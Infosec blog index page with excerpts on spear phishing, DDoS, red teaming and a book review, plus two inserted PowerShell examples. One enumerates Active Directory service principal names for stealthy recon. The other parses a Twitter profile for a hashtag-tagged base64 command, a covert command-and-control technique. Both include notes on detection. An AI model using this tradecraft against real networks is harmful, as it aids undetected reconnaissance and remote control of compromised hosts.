Anatomy of a Spear Phishing attack

Competent IT network admins have upped their security game. They’re constantly on the lookout for news of vulnerabilities, implementing vendor patches and updates with gusto, and even scanning their own systems for open doorways and weaknesses. This is all good and necessary stuff. The upshot is that perimeter defences are strong, the attack surface is shrinking and criminals are finding it increasingly difficult to locate low-hanging fruit.

THE FLIP SIDE

As with the famous Maginot Line, criminals go around the wall and target the ‘meatware’ or ‘human OS’. Every single day, grim news headlines confirm this. Given
Read More

2015: The year of collaboration against online crime

In 2015, news of data breaches – ever larger in size and grimmer in nature – hit the mainstream media in a seemingly never-ending wave. It’s no wonder many within the information security industry feel beset on all sides; adopting a siege mentality is forgivable. I won’t bore you with an in-depth discussion of the psychology of negativity bias – suffice to say, we are wired to be drawn more towards bad news than good. As a result, media outlets cater to our proclivity and we, in turn, focus ever more on the negative over the positive news in a self-reinforcing cycle. This
Read More

Service Principal Name Scanning Active Directory

Dropping these notes here as a reminder for myself; they might be useful for you too. Scanning for services within Active Directory is best done using existing functionality to avoid detection, and that is best achieved through Service Principal Names (SPNs): an LDAP search for servicePrincipalName attributes is the same kind of directory read every domain member performs, whereas a network port sweep stands out. Sean Metcalf created a resource page of useful SPNs; his Active Directory recon code is here. And this is a talk given by Sean earlier this year entitled Red vs. Blue: Modern Active Directory Attacks & Defense.
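The SPN-based service discovery described above, as an added example that is not Sean’s recon code or anything from the original post: it issues one paged LDAP query through ADSI and parses each SPN into service class, host and port. The function name, the parameter names and the default search base are my own choices; it assumes a domain-joined host and a user permitted to read the directory.

```powershell
# Added example (not from the original post or Sean's code): enumerate SPNs with
# an ordinary LDAP read through ADSI instead of scanning the network for ports.
# Assumes a domain-joined host and a user allowed to read the directory.
function Get-SpnInventory {
    param(
        # Service class to look for, e.g. 'MSSQLSvc', 'HTTP', 'TERMSRV'; '*' returns everything.
        [string]$ServiceClass = '*',
        # LDAP search base; defaults to the domain naming context published by RootDSE.
        [string]$SearchBase = [string]([ADSI]'LDAP://RootDSE').defaultNamingContext
    )

    $root     = [ADSI]("LDAP://$SearchBase")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    $searcher.Filter   = "(servicePrincipalName=$ServiceClass/*)"
    $searcher.PageSize = 1000   # paged results, so large domains are returned in full
    $null = $searcher.PropertiesToLoad.AddRange(
        [string[]]@('samaccountname', 'serviceprincipalname', 'objectclass'))

    foreach ($result in $searcher.FindAll()) {
        $props   = $result.Properties
        $account = [string]$props['samaccountname'][0]
        # A user object (not a computer) carrying an SPN runs the service under a
        # domain account; those are the ones worth a second look.
        $isUser  = ($props['objectclass'] -contains 'user') -and
                   -not ($props['objectclass'] -contains 'computer')

        foreach ($spn in $props['serviceprincipalname']) {
            # SPN format: class/host[:port][/name]
            $class, $rest     = $spn -split '/', 2
            $hostPort, $name  = $rest -split '/', 2
            $svcHost, $port   = $hostPort -split ':', 2
            [pscustomobject]@{
                Account      = $account
                IsUserObject = $isUser
                ServiceClass = $class
                Host         = $svcHost
                Port         = $port      # $null when the SPN carries no port
                SPN          = $spn
            }
        }
    }
}

# Usage: list SQL Server instances, then summarise which service classes exist.
# Get-SpnInventory -ServiceClass 'MSSQLSvc' | Format-Table Account, Host, Port
# Get-SpnInventory | Group-Object ServiceClass | Sort-Object Count -Descending
```

The defender’s view of the same query: a single workstation pulling every servicePrincipalName in the domain is unusual, so the LDAP server logs (or a network sensor watching LDAP filters) are where this shows up, not the host firewall.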

Don’t be distracted by the DDoS flashbang

Distributed denial-of-service (DDoS) attacks are on the rise and have been for some time. Report after report shows not only growth in the number of such attacks, but also in their scale, multi-vector nature and complexity. None of this is surprising when you consider the advent of a new acronym: ‘DDoSaaS’, or DDoS-as-a-service. Put simply, rent a botnet from a bad guy, complete with a considerable number of already compromised ‘zombie’ machines, and aim it at your target.

DEFENDING AGAINST A DDOS ATTACK

These attacks are notoriously difficult to defend against. With a ‘zombie army’ of IP addresses, IP blocking
Read More

Command and Control Using Powershell and Twitter

Initially I wanted to update and extend @obscuresec‘s PowerShell Twitter Bot. The problem is that it was written in early 2013 and relied on Twitter’s API v1, which required no authentication. The current Twitter API v1.1 does require authentication and encryption, and although doable from PowerShell, the code is far too verbose for my purposes. With these hurdles in mind I took a closer look at the modus operandi of the Russian threat group using HAMMERTOSS: they avoided the API altogether and had the code simply reach out to the URL of the Twitter handle and look for a hashtag. I thought this
Read More
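The hashtag lookup described above, as an added example that is not from the original post, @obscuresec’s bot or HAMMERTOSS itself: the function takes the HTML of a profile page, strips the markup, finds the agreed hashtag and decodes the base64 token that follows it. The tag name, the base64 wrapping of the command and the sample HTML are all assumptions of mine; in use, the HTML would come from a plain web fetch of the handle’s page.

```powershell
# Added example (not from the original post): pull a command out of a public
# page by hashtag, with no API call and no authentication.
# The tag, the base64 wrapping and the sample HTML below are assumptions.
function Get-HashtagCommand {
    param(
        [Parameter(Mandatory)][string]$Html,
        [string]$Tag = 'nmchk'     # assumed tag; in practice something unremarkable
    )
    # Remove markup so links wrapped around the hashtag do not break the match,
    # then decode entities so '&#x2F;' and friends become plain characters.
    $text = [regex]::Replace($Html, '<[^>]+>', ' ')
    $text = [System.Net.WebUtility]::HtmlDecode($text)

    # '#tag' followed by whitespace and one base64 token.
    $pattern = "#$([regex]::Escape($Tag))\s+([A-Za-z0-9+/=]+)"
    $m = [regex]::Match($text, $pattern)
    if (-not $m.Success) { return $null }

    try {
        $bytes = [Convert]::FromBase64String($m.Groups[1].Value)
        return [System.Text.Encoding]::UTF8.GetString($bytes)
    } catch {
        return $null    # tag present but payload malformed: treat as no command
    }
}

# Constructed sample standing in for a fetched profile page. In use:
#   $html = (Invoke-WebRequest -Uri "https://twitter.com/<handle>" -UseBasicParsing).Content
$sampleHtml = @"
<div class="tweet"><p>Lovely morning #coffee</p></div>
<div class="tweet"><p><a href="/hashtag/nmchk">#nmchk</a> d2hvYW1pIC9hbGw=</p></div>
"@

Get-HashtagCommand -Html $sampleHtml
# whoami /all
```

What makes this hard to spot on the wire is that it is one HTTPS GET to a well-known site; the tell is in the timing (a host fetching the same profile page on a fixed interval) rather than in the destination, which is where a detection rule should look.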

A Few Good Infosec Blog Links

The below are some links posted over the last few days by my Infosec Blogs Twitter account that caught my attention:

Sheets on Sheets on Sheets (Cheat sheets for PowerView, PowerUp and Empire) – By @harmj0y
Protecting Windows Networks – Dealing with Credential Theft – By @dfirblog
Wi-Fi routers – the internet’s next Achilles heel – By @DavidLWaterson
Thoughts on Exploiting a Remote WMI Query Vulnerability – By @mattifestation
Developing an Enterprise IPv6 Security Strategy / Part 1: Baseline Analysis of IPv4 Network Security – By @Enno_Insinuator
Anonymous Versus Da’esh: It’s OPCARTEL All Over Again – By @krypt3ia
84% of consumers think companies should be held responsible for data security
Read More

Raphael Mudge’s Advanced Threat Tactics Course

Going through Raphael Mudge’s Advanced Threat Tactics Course videos and blog post is akin to rummaging through treasure. Although this is a showcase for Cobalt Strike, which is a *must have* tool for IT security Red Team operations and adversary simulation, it is so much more. For me, this course catapulted and solidified my thinking and is the pre-eminent single source of information for not only the tools of advanced threat simulation, but the underlying methodology and tradecraft. I’ll make no bones about it: I consider Cobalt Strike a masterpiece put together by a craftsman, and in case you think I’m going overboard, harmj0y described
Read More

Book Review – Red Team How to Succeed By Thinking Like the Enemy

The truth is, I’m only partway through reading this book, but it is so good that I need to share it with you now to remove the mental “blogging tic” and be totally free to absorb its goodness. The book is Red Team: How to Succeed By Thinking Like the Enemy, published in November and written by Micah Zenko. Zenko has a lucid, logical, vivid, easy writing style, and the book is grounded in facts and littered with real-world examples, born of hundreds of interviews with Red Team practitioners. Zenko has piercing observational skills, which enable him with sniper-like precision to
Read More